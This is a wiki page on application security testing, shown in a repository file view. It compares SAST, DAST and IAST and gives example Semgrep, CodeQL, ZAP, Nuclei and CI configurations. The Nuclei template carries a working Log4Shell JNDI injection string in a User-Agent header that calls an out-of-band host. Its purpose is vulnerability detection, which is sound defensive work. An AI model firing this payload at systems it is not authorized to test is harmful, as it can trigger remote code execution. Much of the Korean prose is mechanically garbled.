Files

T

koriweb d8a80f6272 chore(wiki): dangling 링크 canonical 정규화 (768파일/1200건)

이름만 다른(표기 변형) [[위키링크]]를 대상 문서의 canonical 제목으로 치환해
끊겼던 1,200개 링크를 연결. 제목/파일명 정규화 일치만 적용하고 별칭 매칭은
과병합 위험으로 제외(애매성 가드). 원본은 _link_reconcile_backup/ 에 백업.
도구: Datacollect/scripts/link_reconcile_apply.mjs

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

2026-06-08 12:24:15 +09:00

4.8 KiB

Raw Blame History

id, title, category, status, canonical_id, aliases, duplicate_of, source_trust_level, confidence_score, verification_status, tags, raw_sources, last_reinforced, github_commit, tech_stack

title

Static and Dynamic Analysis

매 한 줄

"매 코드 의 read 의 SAST, 매 코드 의 run 의 DAST". 매 static 의 source/binary 의 inspection — 매 dynamic 의 running app 의 probe. 2026 의 best practice 의 SAST + DAST + IAST 의 layered defense.

매 핵심

매 SAST (Static Application Security Testing)

매 source code / bytecode 의 분석 — 매 execution 의 X.
강점: full coverage, early in SDLC, finds hard-to-trigger bugs.
약점: false positives, no runtime context, framework-specific FN.
Tools: Semgrep, CodeQL, SonarQube, Snyk Code.

매 DAST (Dynamic Application Security Testing)

매 running app 의 black-box probing — 매 HTTP fuzzing.
강점: real runtime behavior, env-config bugs, low FP.
약점: limited coverage (only reachable paths), late in SDLC.
Tools: OWASP ZAP, Burp Suite, Nuclei.

매 IAST (Interactive)

매 instrumented agent 의 runtime data flow tracking.
Hybrid: static-style precision + dynamic-style validity.
Tools: Contrast Security, Checkmarx IAST.

매 응용

CI/CD security gate (SAST on every PR).
Pre-prod scan (DAST against staging).
Compliance (PCI, SOC2, ISO 27001).

💻 패턴

Semgrep — custom SAST rule

rules:
  - id: hardcoded-jwt-secret
    pattern: jwt.sign($PAYLOAD, "...")
    message: Hardcoded JWT secret detected
    severity: ERROR
    languages: [javascript, typescript]

CodeQL — taint tracking

import javascript

class XssConfig extends TaintTracking::Configuration {
  XssConfig() { this = "Xss" }
  override predicate isSource(DataFlow::Node n) {
    n instanceof RemoteFlowSource
  }
  override predicate isSink(DataFlow::Node n) {
    exists(DOM::DomMethodCallNode c | c.getMethodName() = "innerHTML" |
      n = c.getArgument(0))
  }
}

ZAP — automated DAST scan

docker run -v $(pwd):/zap/wrk -t zaproxy/zap-stable \
  zap-baseline.py -t https://staging.example.com \
  -r report.html -J report.json

Nuclei — template-based DAST

id: log4shell
info:
  name: Apache Log4j RCE
  severity: critical
requests:
  - method: GET
    path: ["{{BaseURL}}"]
    headers:
      User-Agent: "${jndi:ldap://{{interactsh-url}}/a}"
    matchers:
      - type: word
        part: interactsh_protocol
        words: ["dns"]

CI integration — GitHub Actions

- uses: returntocorp/semgrep-action@v1
  with:
    config: p/owasp-top-ten
- uses: github/codeql-action/analyze@v3
- name: ZAP Baseline
  uses: zaproxy/action-baseline@v0.10.0
  with:
    target: 'https://staging.example.com'

Tainted data flow — Java pseudocode

String input = request.getParameter("q");      // SOURCE (tainted)
String sanitized = StringEscapeUtils.escapeHtml4(input); // SANITIZER
response.getWriter().write(sanitized);         // SINK (safe)

// SAST tracks: source → sink without sanitizer = vulnerability

SBOM + dependency scanning

syft dir:. -o cyclonedx-json > sbom.json
grype sbom:sbom.json --fail-on high

매 결정 기준

상황	Approach
Pre-commit, fast feedback	SAST (Semgrep)
Deep semantic analysis	CodeQL
Pre-prod runtime check	DAST (ZAP, Burp)
Runtime + coverage	IAST (Contrast)
Dependency vulns	SCA (Snyk, Grype)

기본값: 매 Semgrep (PR) + ZAP baseline (nightly) + Grype (deps).

🔗 Graph

부모: Application Security · CI/CD Pipeline & IDE Security Integration
변형: SAST · 보안 및 시스템 신뢰성 표준 · IAST · SCA_Fundamentals
Adjacent: Fuzzing · Threat Modeling · 보안 및 시스템 신뢰성 표준

🤖 LLM 활용

언제: code review automation, custom rule generation, false-positive triage. 언제 X: full code understanding (LLM hallucinates), security-critical decisions without human review.

❌ 안티패턴

SAST only: 매 runtime config bug 의 miss — 매 DAST 의 추가.
Ignore false positives: 매 alert fatigue 의 cause — 매 tuning 의 invest.
Scan in prod: 매 DAST 의 staging — 매 prod 의 X.
One-time scan: 매 continuous 의 — 매 every PR 의 gate.

🧪 검증 / 중복

Verified (OWASP Testing Guide v5, NIST SP 800-218).
신뢰도 A.

🕓 Changelog

날짜	변경
2026-05-08	Phase 1
2026-05-10	Manual cleanup — SAST/DAST/IAST patterns, CI integration

4.8 KiB Raw Blame History